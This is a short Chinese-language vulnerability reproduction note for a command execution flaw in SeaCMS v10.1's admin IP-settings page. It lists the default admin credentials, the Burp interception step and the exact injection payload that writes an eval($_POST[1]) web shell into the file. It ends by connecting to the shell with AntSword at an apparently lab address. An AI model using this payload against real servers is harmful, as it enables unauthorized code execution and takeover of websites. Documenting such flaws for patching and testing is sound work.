漏洞描述
海洋 CMS 一套程序自适应电脑、手机、平板、APP 多个终端入口。 SeaCMS v10.1 存在命令执行漏洞,在 w1aqhp/admin_ip.php 下第五行使用 set 参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。 后台路径:/manager 后台密码:admin:admin
漏洞复现
登录后台
后台 IP 安全设置
点击确认后 bp 进行抓包,改包
v=0&ip=+127.0.0.1";eval($_POST[1]);//
蚁剑连接
http://10.9.47.6:33025/manager/admin_ip.php
获得 shell